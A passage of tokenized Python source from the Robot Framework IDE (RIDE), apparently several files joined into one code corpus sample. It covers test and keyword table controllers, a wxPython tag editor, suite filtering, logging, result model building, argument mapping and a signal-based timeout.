<EOL> items [ idx ] , items [ lower ] = items [ lower ] , items [ idx ] <EOL> self . mark_dirty ( ) <EOL> RideItemMovedDown ( item = self . _create_controller ( item ) ) . publish ( ) <EOL> return True <EOL> def validate_name ( self , name , named_ctrl = None ) : <EOL> return MacroNameValidation ( self , name , named_ctrl ) <EOL> def delete ( self , ctrl ) : <EOL> self . _items . remove ( ctrl . data ) <EOL> if ctrl . data in self . _item_to_controller : <EOL> del self . _item_to_controller [ ctrl . data ] <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . _notify_removal ( ctrl ) <EOL> def add ( self , ctrl ) : <EOL> item = ctrl . data <EOL> item . parent = self . _table <EOL> self . _items . append ( item ) <EOL> new_controller = self . _create_controller ( item ) <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . _notify_creation ( new_controller . name , new_controller ) <EOL> def _create_new ( self , name , config = None ) : <EOL> name = name . strip ( ) <EOL> ctrl = self . _create_controller ( self . _table . add ( name ) ) <EOL> self . _configure_controller ( ctrl , config ) <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . _notify_creation ( name , ctrl ) <EOL> return ctrl <EOL> def _configure_controller ( self , ctrl , config ) : <EOL> pass <EOL> class TestCaseTableController ( _MacroTable ) : <EOL> item_type = '<STR_LIT>' <EOL> _controller_class = TestCaseController <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . tests <EOL> def _notify_creation ( self , name , ctrl ) : <EOL> RideTestCaseAdded ( datafile = self . datafile , name = name , item = ctrl ) . publish ( ) <EOL> def _notify_removal ( self , item ) : <EOL> RideTestCaseRemoved ( datafile = self . datafile , name = item . name , item = item ) . publish ( ) <EOL> def new ( self , name ) : <EOL> return self . _create_new ( name ) <EOL> class KeywordTableController ( _MacroTable ) : <EOL> item_type = '<STR_LIT>' <EOL> _controller_class = UserKeywordController <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . keywords <EOL> def _notify_creation ( self , name , ctrl ) : <EOL> RideUserKeywordAdded ( datafile = self . datafile , name = name , item = ctrl ) . publish ( ) <EOL> def _notify_removal ( self , item ) : <EOL> RideUserKeywordRemoved ( datafile = self . datafile , name = item . name , item = item ) . publish ( ) <EOL> def new ( self , name , argstr = '<STR_LIT>' ) : <EOL> return self . _create_new ( name , argstr ) <EOL> def _configure_controller ( self , ctrl , config ) : <EOL> if config : <EOL> ctrl . arguments . set_value ( config ) <EOL> def sort ( self ) : <EOL> """<STR_LIT>""" <EOL> keywords_sorted = sorted ( self . _table . keywords , key = lambda userkeyword : userkeyword . name ) <EOL> index_difference = self . _index_difference ( self . _table . keywords , keywords_sorted ) <EOL> self . _table . keywords = keywords_sorted <EOL> return index_difference <EOL> def _index_difference ( self , original_list , sorted_list ) : <EOL> """<STR_LIT>""" <EOL> index_difference = [ ] <EOL> for kw in original_list : <EOL> counter = <NUM_LIT:0> <EOL> for kw2 in sorted_list : <EOL> if kw . name == kw2 . name : <EOL> index_difference . append ( counter ) <EOL> break <EOL> counter += <NUM_LIT:1> <EOL> return index_difference <EOL> def restore_keyword_order ( self , list ) : <EOL> """<STR_LIT>""" <EOL> keywords_temp = [ ] <EOL> for i in list : <EOL> keywords_temp . append ( self . _table . keywords [ i ] ) <EOL> self . _table . keywords = keywords_temp <EOL> class ImportSettingsController ( _TableController , _WithListOperations ) : <EOL> def __init__ ( self , parent_controller , table , resource_file_controller_factory = None ) : <EOL> _TableController . __init__ ( self , parent_controller , table ) <EOL> self . _resource_file_controller_factory = resource_file_controller_factory <EOL> self . __import_controllers = None <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _import_controllers ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _import_controllers [ index ] <EOL> @ property <EOL> def _import_controllers ( self ) : <EOL> if self . __import_controllers is None : <EOL> self . __import_controllers = [ self . _import_controller ( imp ) for imp in self . _items ] <EOL> return self . __import_controllers <EOL> def _import_controller ( self , import_ ) : <EOL> return ImportController ( self , import_ ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . imports <EOL> @ property <EOL> def resource_file_controller_factory ( self ) : <EOL> return self . _resource_file_controller_factory <EOL> @ overrides ( _WithListOperations ) <EOL> def _swap ( self , ind1 , ind2 ) : <EOL> imps = self . _import_controllers <EOL> imps [ ind1 ] , imps [ ind2 ] = imps [ ind2 ] , imps [ ind1 ] <EOL> _WithListOperations . _swap ( self , ind1 , ind2 ) <EOL> def remove_import_data ( self , imp ) : <EOL> self . delete ( self . _items . data . index ( imp ) ) <EOL> def delete ( self , index ) : <EOL> item = self [ index ] <EOL> _WithListOperations . delete ( self , index ) <EOL> self . _import_controllers . pop ( index ) <EOL> item . publish_removed ( ) <EOL> self . notify_imports_modified ( ) <EOL> def add_library ( self , name , argstr , alias , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_library ( name , utils . split_value ( argstr ) , <EOL> comment ) <EOL> import_ . alias = alias <EOL> self . _parent . mark_dirty ( ) <EOL> self . _add_controller ( import_ ) <EOL> self . notify_imports_modified ( ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def _add_controller ( self , import_ ) : <EOL> ctrl = self . _import_controller ( import_ ) <EOL> ctrl . publish_added ( ) <EOL> self . _import_controllers . append ( ctrl ) <EOL> def add_resource ( self , path , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_resource ( path , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> self . resource_import_modified ( path ) <EOL> self . _add_controller ( import_ ) <EOL> self . notify_imports_modified ( ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def add_variables ( self , path , argstr , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_variables ( path , utils . split_value ( argstr ) , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> self . _add_controller ( import_ ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def notify_imports_modified ( self ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> def resource_import_modified ( self , path ) : <EOL> return self . _parent . resource_import_modified ( path ) <EOL> class MetadataListController ( _TableController , _WithListOperations ) : <EOL> def __iter__ ( self ) : <EOL> return iter ( MetadataController ( self , m ) for m in self . _items ) <EOL> def __getitem__ ( self , index ) : <EOL> return MetadataController ( self , self . _items [ index ] ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . metadata <EOL> def add_metadata ( self , name , value , comment = None ) : <EOL> self . _table . add_metadata ( name , value , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> return self [ - <NUM_LIT:1> ] </s>
<s> if __name__ == '<STR_LIT:__main__>' : <EOL> import robotide as _ <EOL> import wx <EOL> from robotide . editor . flowsizer import HorizontalFlowSizer <EOL> from robotide . controller . commands import ChangeTag <EOL> from robotide . controller . tags import ForcedTag , DefaultTag , Tag <EOL> class TagsDisplay ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , wx . ID_ANY ) <EOL> self . _controller = controller <EOL> self . _sizer = HorizontalFlowSizer ( ) <EOL> self . _sizer . SetMinSize ( ( <NUM_LIT:0> , <NUM_LIT:20> ) ) <EOL> self . _tag_boxes = [ ] <EOL> self . SetSizer ( self . _sizer ) <EOL> def add_tag ( self , tag ) : <EOL> self . _add_tagbox ( Properties ( tag , self . _controller ) ) <EOL> def _add_tagbox ( self , properties ) : <EOL> tagbox = TagBox ( self , properties ) <EOL> self . _sizer . Add ( tagbox ) <EOL> self . _tag_boxes . append ( tagbox ) <EOL> def build ( self ) : <EOL> if not ( self . _tag_boxes and self . _tag_boxes [ - <NUM_LIT:1> ] . add_new ) : <EOL> self . add_new_tag_tagbox ( rebuild = False ) <EOL> parent_sizer = self . GetParent ( ) . GetSizer ( ) <EOL> if parent_sizer : <EOL> parent_sizer . Layout ( ) <EOL> def clear ( self ) : <EOL> self . set_value ( self . _controller ) <EOL> def close ( self ) : <EOL> for tag_box in self . _tag_boxes : <EOL> tag_box . close ( ) <EOL> def saving ( self ) : <EOL> for tag_box in self . _tag_boxes : <EOL> tag_box . saving ( ) <EOL> def set_value ( self , controller , plugin = None ) : <EOL> if not self . _tag_boxes : <EOL> self . _add_tags ( list ( controller ) ) <EOL> else : <EOL> self . _modify_values ( controller ) <EOL> self . build ( ) <EOL> def add_new_tag_tagbox ( self , rebuild = True ) : <EOL> self . _add_tagbox ( AddTagBoxProperties ( self . _controller . empty_tag ( ) , self ) ) <EOL> if rebuild : <EOL> self . build ( ) <EOL> def _add_tags ( self , tags ) : <EOL> for tag in tags : <EOL> self . add_tag ( tag ) <EOL> def _modify_values ( self , controller ) : <EOL> self . _remove_empty_tagboxes ( ) <EOL> self . _set_tags ( list ( controller ) , self . _tag_boxes [ : ] , controller ) <EOL> def _remove_empty_tagboxes ( self ) : <EOL> for tb in self . _tag_boxes [ : ] : <EOL> if tb . value == '<STR_LIT>' : <EOL> self . _destroy_tagbox ( tb ) <EOL> def _set_tags ( self , tags , tagboxes , controller ) : <EOL> if not tags : <EOL> self . _destroy_tagboxes ( tagboxes ) <EOL> elif not tagboxes : <EOL> self . _add_tags ( tags ) <EOL> else : <EOL> tagboxes [ <NUM_LIT:0> ] . set_properties ( Properties ( tags [ <NUM_LIT:0> ] , controller ) ) <EOL> self . _set_tags ( tags [ <NUM_LIT:1> : ] , tagboxes [ <NUM_LIT:1> : ] , controller ) <EOL> def _destroy_tagboxes ( self , tagboxes ) : <EOL> for tb in tagboxes : <EOL> if not tb . add_new : <EOL> self . _destroy_tagbox ( tb ) <EOL> def _destroy_tagbox ( self , tagbox ) : <EOL> tagbox . Destroy ( ) <EOL> self . _tag_boxes . remove ( tagbox ) <EOL> def GetSelection ( self ) : <EOL> return None <EOL> def get_height ( self ) : <EOL> return self . _sizer . height <EOL> class TagBox ( wx . TextCtrl ) : <EOL> def __init__ ( self , parent , properties ) : <EOL> wx . TextCtrl . __init__ ( self , parent , wx . ID_ANY , '<STR_LIT>' , style = wx . TE_CENTER ) <EOL> self . _bind ( ) <EOL> self . set_properties ( properties ) <EOL> def _bind ( self ) : <EOL> for event , handler in [ ( wx . EVT_SET_FOCUS , self . OnSetFocus ) , <EOL> ( wx . EVT_KILL_FOCUS , self . OnKillFocus ) , <EOL> ( wx . EVT_LEFT_UP , self . OnSetFocus ) , <EOL> ( wx . EVT_KEY_UP , self . OnKeyUp ) , <EOL> ( wx . EVT_CHAR , self . OnChar ) ] : <EOL> self . Bind ( event , handler ) <EOL> def set_properties ( self , properties ) : <EOL> self . _properties = properties <EOL> self . _apply_properties ( ) <EOL> def _apply_properties ( self ) : <EOL> self . SetValue ( self . _properties . text ) <EOL> self . SetToolTipString ( self . _properties . tooltip ) <EOL> self . SetEditable ( self . _properties . enabled ) <EOL> size = self . _get_size ( ) <EOL> self . SetMaxSize ( size ) <EOL> self . SetMinSize ( size ) <EOL> self . _colorize ( ) <EOL> def _get_size ( self ) : <EOL> size = self . GetTextExtent ( self . value ) <EOL> return wx . Size ( max ( size [ <NUM_LIT:0> ] + <NUM_LIT:10> , <NUM_LIT> ) , max ( size [ <NUM_LIT:1> ] + <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> def _colorize ( self ) : <EOL> self . SetForegroundColour ( self . _properties . foreground_color ) <EOL> self . SetBackgroundColour ( self . _properties . background_color ) <EOL> def close ( self ) : <EOL> self . _update_value ( ) <EOL> def saving ( self ) : <EOL> self . _update_value ( ) <EOL> def OnKeyUp ( self , event ) : <EOL> if self . _properties . modifiable : <EOL> if event . GetKeyCode ( ) == wx . WXK_ESCAPE : <EOL> self . _cancel_editing ( ) <EOL> elif event . GetKeyCode ( ) == wx . WXK_RETURN : <EOL> self . _update_value ( ) <EOL> return <EOL> elif event . GetKeyCode ( ) == wx . WXK_DELETE : <EOL> self . SetValue ( '<STR_LIT>' ) <EOL> event . Skip ( ) <EOL> def _cancel_editing ( self ) : <EOL> self . SetValue ( self . _properties . text ) <EOL> self . _colorize ( ) <EOL> def OnChar ( self , event ) : <EOL> if event . GetKeyCode ( ) != wx . WXK_ESCAPE : <EOL> self . _properties . activate ( self ) <EOL> event . Skip ( ) <EOL> def OnKillFocus ( self , event ) : <EOL> self . _update_value ( ) <EOL> def _update_value ( self ) : <EOL> self . _properties . change_value ( self . value ) <EOL> def OnSetFocus ( self , event ) : <EOL> if self . _properties . add_new : <EOL> wx . CallAfter ( self . SelectAll ) <EOL> event . Skip ( ) <EOL> @ property <EOL> def value ( self ) : <EOL> return self . GetValue ( ) . strip ( ) <EOL> @ property <EOL> def add_new ( self ) : <EOL> return self . _properties . add_new <EOL> def Properties ( tag , controller ) : <EOL> if tag . controller == controller : <EOL> return TagBoxProperties ( tag ) <EOL> return tag . choose ( { ForcedTag : ForcedTagBoxProperties , <EOL> DefaultTag : DefaultTagBoxProperties } ) ( tag ) <EOL> class _TagBoxProperties ( object ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = True <EOL> add_new = False <EOL> def __init__ ( self , tag ) : <EOL> self . _tag = tag <EOL> @ property <EOL> def text ( self ) : <EOL> return self . _tag . name or '<STR_LIT>' <EOL> @ property <EOL> def tooltip ( self ) : <EOL> return self . _tag . tooltip <EOL> @ property <EOL> def modifiable ( self ) : <EOL> return self . enabled <EOL> def change_value ( self , value ) : <EOL> if self . modifiable and value != self . text : <EOL> self . _tag . controller . execute ( ChangeTag ( self . _tag , value ) ) <EOL> def activate ( self , tagbox ) : <EOL> pass <EOL> class TagBoxProperties ( _TagBoxProperties ) : <EOL> pass <EOL> class AddTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> text = '<STR_LIT>' <EOL> tooltip = '<STR_LIT>' <EOL> modifiable = False <EOL> add_new = True <EOL> def __init__ ( self , tag , display ) : <EOL> _TagBoxProperties . __init__ ( self , tag ) <EOL> self . _display = display <EOL> def activate ( self , tagbox ) : <EOL> tagbox . set_properties ( TagBoxProperties ( self . _tag ) ) <EOL> self . _display . add_new_tag_tagbox ( ) <EOL> class ForcedTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = False <EOL> class DefaultTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = False <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> class MyFrame ( wx . Frame ) : <EOL> def __init__ ( self , parent , id , title ) : <EOL> wx . Frame . __init__ ( self , parent , id , title ) <EOL> class MyMenuApp ( wx . App ) : <EOL> def OnInit ( self ) : <EOL> frame = MyFrame ( None , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> sz = wx . BoxSizer ( ) <EOL> display = TagsDisplay ( frame , None ) <EOL> display . add_tag ( ForcedTag ( '<STR_LIT>' ) , False ) <EOL> display . add_tag ( DefaultTag ( '<STR_LIT:default>' ) , False ) <EOL> for name in [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> display . add_tag ( Tag ( name ) , True ) <EOL> display . add_tag ( Tag ( '<STR_LIT>' ) , False ) <EOL> display . build ( ) <EOL> sz . Add ( display , <NUM_LIT:0> , wx . GROW | wx . ALL , <NUM_LIT:5> ) <EOL> frame . Show ( True ) <EOL> self . SetTopWindow ( frame ) <EOL> return True <EOL> app = MyMenuApp ( <NUM_LIT:0> ) <EOL> app . MainLoop ( ) </s>
<s> import os <EOL> class LibdocOutput ( object ) : <EOL> def __init__ ( self , output_path , format ) : <EOL> self . _output_path = output_path <EOL> self . _format = format . upper ( ) <EOL> self . _output_file = None <EOL> def __enter__ ( self ) : <EOL> if self . _format == '<STR_LIT>' : <EOL> self . _output_file = open ( self . _output_path , '<STR_LIT:w>' ) <EOL> return self . _output_file <EOL> return self . _output_path <EOL> def __exit__ ( self , * exc_info ) : <EOL> if self . _output_file : <EOL> self . _output_file . close ( ) <EOL> if any ( exc_info ) : <EOL> os . remove ( self . _output_path ) </s>
<s> from robotide . lib . robot . utils import setter <EOL> from . tags import TagPatterns <EOL> from . namepatterns import SuiteNamePatterns , TestNamePatterns <EOL> from . visitor import SuiteVisitor <EOL> class EmptySuiteRemover ( SuiteVisitor ) : <EOL> def end_suite ( self , suite ) : <EOL> suite . suites = [ s for s in suite . suites if s . test_count ] <EOL> def visit_test ( self , test ) : <EOL> pass <EOL> def visit_keyword ( self , kw ) : <EOL> pass <EOL> class Filter ( EmptySuiteRemover ) : <EOL> def __init__ ( self , include_suites = None , include_tests = None , <EOL> include_tags = None , exclude_tags = None ) : <EOL> self . include_suites = include_suites <EOL> self . include_tests = include_tests <EOL> self . include_tags = include_tags <EOL> self . exclude_tags = exclude_tags <EOL> @ setter <EOL> def include_suites ( self , suites ) : <EOL> return SuiteNamePatterns ( suites ) if not isinstance ( suites , SuiteNamePatterns ) else suites <EOL> @ setter <EOL> def include_tests ( self , tests ) : <EOL> return TestNamePatterns ( tests ) if not isinstance ( tests , TestNamePatterns ) else tests <EOL> @ setter <EOL> def include_tags ( self , tags ) : <EOL> return TagPatterns ( tags ) if not isinstance ( tags , TagPatterns ) else tags <EOL> @ setter <EOL> def exclude_tags ( self , tags ) : <EOL> return TagPatterns ( tags ) if not isinstance ( tags , TagPatterns ) else tags <EOL> def start_suite ( self , suite ) : <EOL> if not self : <EOL> return False <EOL> if hasattr ( suite , '<STR_LIT>' ) : <EOL> suite . starttime = suite . endtime = None <EOL> if self . include_suites : <EOL> return self . _filter_by_suite_name ( suite ) <EOL> if self . include_tests : <EOL> suite . tests = self . _filter ( suite , self . _included_by_test_name ) <EOL> if self . include_tags : <EOL> suite . tests = self . _filter ( suite , self . _included_by_tags ) <EOL> if self . exclude_tags : <EOL> suite . tests = self . _filter ( suite , self . _not_excluded_by_tags ) <EOL> return bool ( suite . suites ) <EOL> def _filter_by_suite_name ( self , suite ) : <EOL> if self . include_suites . match ( suite . name , suite . longname ) : <EOL> suite . visit ( Filter ( include_suites = [ ] , <EOL> include_tests = self . include_tests , <EOL> include_tags = self . include_tags , <EOL> exclude_tags = self . exclude_tags ) ) <EOL> return False <EOL> suite . tests = [ ] <EOL> return True <EOL> def _filter ( self , suite , filter ) : <EOL> return [ t for t in suite . tests if filter ( t ) ] <EOL> def _included_by_test_name ( self , test ) : <EOL> return self . include_tests . match ( test . name , test . longname ) <EOL> def _included_by_tags ( self , test ) : <EOL> return self . include_tags . match ( test . tags ) <EOL> def _not_excluded_by_tags ( self , test ) : <EOL> return not self . exclude_tags . match ( test . tags ) <EOL> def __nonzero__ ( self ) : <EOL> return bool ( self . include_suites or self . include_tests or <EOL> self . include_tags or self . exclude_tags ) </s>
<s> from robotide . lib . robot . errors import DataError <EOL> from . loggerhelper import AbstractLogger <EOL> class FileLogger ( AbstractLogger ) : <EOL> def __init__ ( self , path , level ) : <EOL> AbstractLogger . __init__ ( self , level ) <EOL> self . _writer = self . _get_writer ( path ) <EOL> def _get_writer ( self , path ) : <EOL> try : <EOL> return open ( path , '<STR_LIT:w>' ) <EOL> except EnvironmentError as err : <EOL> raise DataError ( err . strerror ) <EOL> def message ( self , msg ) : <EOL> if self . _is_logged ( msg . level ) and not self . _writer . closed : <EOL> entry = '<STR_LIT>' % ( msg . timestamp , msg . level . ljust ( <NUM_LIT:5> ) , <EOL> msg . message ) <EOL> self . _writer . write ( entry . encode ( '<STR_LIT>' ) ) <EOL> def start_suite ( self , suite ) : <EOL> self . info ( "<STR_LIT>" % suite . name ) <EOL> def end_suite ( self , suite ) : <EOL> self . info ( "<STR_LIT>" % suite . name ) <EOL> def start_test ( self , test ) : <EOL> self . info ( "<STR_LIT>" % test . name ) <EOL> def end_test ( self , test ) : <EOL> self . info ( "<STR_LIT>" % test . name ) <EOL> def start_keyword ( self , kw ) : <EOL> self . debug ( lambda : "<STR_LIT>" % kw . name ) <EOL> def end_keyword ( self , kw ) : <EOL> self . debug ( lambda : "<STR_LIT>" % kw . name ) <EOL> def output_file ( self , name , path ) : <EOL> self . info ( '<STR_LIT>' % ( name , path ) ) <EOL> def close ( self ) : <EOL> self . _writer . close ( ) </s>
<s> from robotide . lib . robot . output import LEVELS <EOL> from . jsbuildingcontext import JsBuildingContext <EOL> from . jsexecutionresult import JsExecutionResult <EOL> class JsModelBuilder ( object ) : <EOL> def __init__ ( self , log_path = None , split_log = False , <EOL> prune_input_to_save_memory = False ) : <EOL> self . _context = JsBuildingContext ( log_path , split_log , <EOL> prune_input_to_save_memory ) <EOL> def build_from ( self , result_from_xml ) : <EOL> return JsExecutionResult ( <EOL> statistics = StatisticsBuilder ( ) . build ( result_from_xml . statistics ) , <EOL> suite = SuiteBuilder ( self . _context ) . build ( result_from_xml . suite ) , <EOL> errors = ErrorsBuilder ( self . _context ) . build ( result_from_xml . errors ) , <EOL> strings = self . _context . strings , <EOL> basemillis = self . _context . basemillis , <EOL> split_results = self . _context . split_results , <EOL> min_level = self . _context . min_level <EOL> ) <EOL> class _Builder ( object ) : <EOL> _statuses = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } <EOL> def __init__ ( self , context ) : <EOL> self . _context = context <EOL> self . _string = self . _context . string <EOL> self . _html = self . _context . html <EOL> self . _timestamp = self . _context . timestamp <EOL> def _get_status ( self , item ) : <EOL> model = ( self . _statuses [ item . status ] , <EOL> self . _timestamp ( item . starttime ) , <EOL> item . elapsedtime ) <EOL> msg = getattr ( item , '<STR_LIT:message>' , '<STR_LIT>' ) <EOL> if not msg : <EOL> return model <EOL> elif msg . startswith ( '<STR_LIT>' ) : <EOL> msg = self . _string ( msg [ <NUM_LIT:6> : ] . lstrip ( ) , escape = False ) <EOL> else : <EOL> msg = self . _string ( msg ) <EOL> return model + ( msg , ) <EOL> def _build_keywords ( self , kws , split = False ) : <EOL> splitting = self . _context . start_splitting_if_needed ( split ) <EOL> model = tuple ( self . _build_keyword ( k ) for k in kws ) <EOL> return model if not splitting else self . _context . end_splitting ( model ) <EOL> class SuiteBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_suite = self . build <EOL> self . _build_test = TestBuilder ( context ) . build <EOL> self . _build_keyword = KeywordBuilder ( context ) . build <EOL> def build ( self , suite ) : <EOL> with self . _context . prune_input ( suite . suites , suite . tests , suite . keywords ) : <EOL> stats = self . _get_statistics ( suite ) <EOL> return ( self . _string ( suite . name , attr = True ) , <EOL> self . _string ( suite . source ) , <EOL> self . _context . relative_source ( suite . source ) , <EOL> self . _html ( suite . doc ) , <EOL> tuple ( self . _yield_metadata ( suite ) ) , <EOL> self . _get_status ( suite ) , <EOL> tuple ( self . _build_suite ( s ) for s in suite . suites ) , <EOL> tuple ( self . _build_test ( t ) for t in suite . tests ) , <EOL> tuple ( self . _build_keyword ( k , split = True ) for k in suite . keywords ) , <EOL> stats ) <EOL> def _yield_metadata ( self , suite ) : <EOL> for name , value in suite . metadata . iteritems ( ) : <EOL> yield self . _string ( name ) <EOL> yield self . _html ( value ) <EOL> def _get_statistics ( self , suite ) : <EOL> stats = suite . statistics <EOL> return ( stats . all . total , <EOL> stats . all . passed , <EOL> stats . critical . total , <EOL> stats . critical . passed ) <EOL> class TestBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_keyword = KeywordBuilder ( context ) . build <EOL> def build ( self , test ) : <EOL> with self . _context . prune_input ( test . keywords ) : <EOL> return ( self . _string ( test . name , attr = True ) , <EOL> self . _string ( test . timeout ) , <EOL> int ( test . critical ) , <EOL> self . _html ( test . doc ) , <EOL> tuple ( self . _string ( t ) for t in test . tags ) , <EOL> self . _get_status ( test ) , <EOL> self . _build_keywords ( test . keywords , split = True ) ) <EOL> class KeywordBuilder ( _Builder ) : <EOL> _types = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:4> } <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_keyword = self . build <EOL> self . _build_message = MessageBuilder ( context ) . build <EOL> def build ( self , kw , split = False ) : <EOL> with self . _context . prune_input ( kw . messages , kw . keywords ) : <EOL> return ( self . _types [ kw . type ] , <EOL> self . _string ( kw . kwname , attr = True ) , <EOL> self . _string ( kw . libname , attr = True ) , <EOL> self . _string ( kw . timeout ) , <EOL> self . _html ( kw . doc ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . args ) ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . assign ) ) , <EOL> self . _string ( '<STR_LIT:U+002CU+0020>' . join ( kw . tags ) ) , <EOL> self . _get_status ( kw ) , <EOL> self . _build_keywords ( kw . keywords , split ) , <EOL> tuple ( self . _build_message ( m ) for m in kw . messages ) ) <EOL> class MessageBuilder ( _Builder ) : <EOL> def build ( self , msg ) : <EOL> if msg . level in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _context . create_link_target ( msg ) <EOL> self . _context . message_level ( msg . level ) <EOL> return self . _build ( msg ) <EOL> def _build ( self , msg ) : <EOL> return ( self . _timestamp ( msg . timestamp ) , <EOL> LEVELS [ msg . level ] , <EOL> self . _string ( msg . html_message , escape = False ) ) <EOL> class StatisticsBuilder ( object ) : <EOL> def build ( self , statistics ) : <EOL> return ( self . _build_stats ( statistics . total ) , <EOL> self . _build_stats ( statistics . tags ) , <EOL> self . _build_stats ( statistics . suite ) ) <EOL> def _build_stats ( self , stats ) : <EOL> return tuple ( stat . get_attributes ( include_label = True , include_elapsed = True , <EOL> exclude_empty = True , html_escape = True ) <EOL> for stat in stats ) <EOL> class ErrorsBuilder ( _Builder ) : <EOL> def __init__ ( self , context ) : <EOL> _Builder . __init__ ( self , context ) <EOL> self . _build_message = ErrorMessageBuilder ( context ) . build <EOL> def build ( self , errors ) : <EOL> with self . _context . prune_input ( errors . messages ) : <EOL> return tuple ( self . _build_message ( msg ) for msg in errors ) <EOL> class ErrorMessageBuilder ( MessageBuilder ) : <EOL> def build ( self , msg ) : <EOL> model = self . _build ( msg ) <EOL> link = self . _context . link ( msg ) <EOL> return model if link is None else model + ( link , ) </s>
<s> from robotide . lib . robot . errors import DataError <EOL> from robotide . lib . robot . utils import DotDict <EOL> class ArgumentMapper ( object ) : <EOL> def __init__ ( self , argspec ) : <EOL> self . _argspec = argspec <EOL> def map ( self , positional , named , variables = None , prune_trailing_defaults = False ) : <EOL> template = KeywordCallTemplate ( self . _argspec , variables ) <EOL> template . fill_positional ( positional ) <EOL> template . fill_named ( named ) <EOL> if prune_trailing_defaults : <EOL> template . prune_trailing_defaults ( ) <EOL> template . fill_defaults ( ) <EOL> return template . args , template . kwargs <EOL> class KeywordCallTemplate ( object ) : <EOL> def __init__ ( self , argspec , variables ) : <EOL> defaults = argspec . defaults <EOL> if variables : <EOL> defaults = variables . replace_list ( defaults ) <EOL> self . _positional = argspec . positional <EOL> self . _supports_kwargs = bool ( argspec . kwargs ) <EOL> self . _supports_named = argspec . supports_named <EOL> self . args = [ None ] * argspec . minargs + [ Default ( d ) for d in defaults ] <EOL> self . kwargs = DotDict ( ) <EOL> def fill_positional ( self , positional ) : <EOL> self . args [ : len ( positional ) ] = positional <EOL> def fill_named ( self , named ) : <EOL> for name , value in named . items ( ) : <EOL> if name in self . _positional and self . _supports_named : <EOL> index = self . _positional . index ( name ) <EOL> self . args [ index ] = value <EOL> elif self . _supports_kwargs : <EOL> self . kwargs [ name ] = value <EOL> else : <EOL> raise DataError ( "<STR_LIT>" % name ) <EOL> def prune_trailing_defaults ( self ) : <EOL> while self . args and isinstance ( self . args [ - <NUM_LIT:1> ] , Default ) : <EOL> self . args . pop ( ) <EOL> def fill_defaults ( self ) : <EOL> self . args = [ arg if not isinstance ( arg , Default ) else arg . value <EOL> for arg in self . args ] <EOL> class Default ( object ) : <EOL> def __init__ ( self , value ) : <EOL> self . value = value </s>
<s> from signal import setitimer , signal , SIGALRM , ITIMER_REAL <EOL> from robotide . lib . robot . errors import TimeoutError <EOL> class Timeout ( object ) : <EOL> def __init__ ( self , timeout , error ) : <EOL> self . _timeout = timeout <EOL> self . _error = error <EOL> def execute ( self , runnable ) : <EOL> self . _start_timer ( ) <EOL> try : <EOL> return runnable ( ) <EOL> finally : <EOL> self . _stop_timer ( ) <EOL> def _start_timer ( self ) : <EOL> signal ( SIGALRM , self . _raise_timeout_error ) <EOL> setitimer ( ITIMER_REAL , self . _timeout ) <EOL> def _raise_timeout_error ( self , signum , frame ) : <EOL> raise TimeoutError ( self . _error ) <EOL> def _stop_timer ( self ) : <EOL> setitimer ( ITIMER_REAL , <NUM_LIT:0> ) </s>
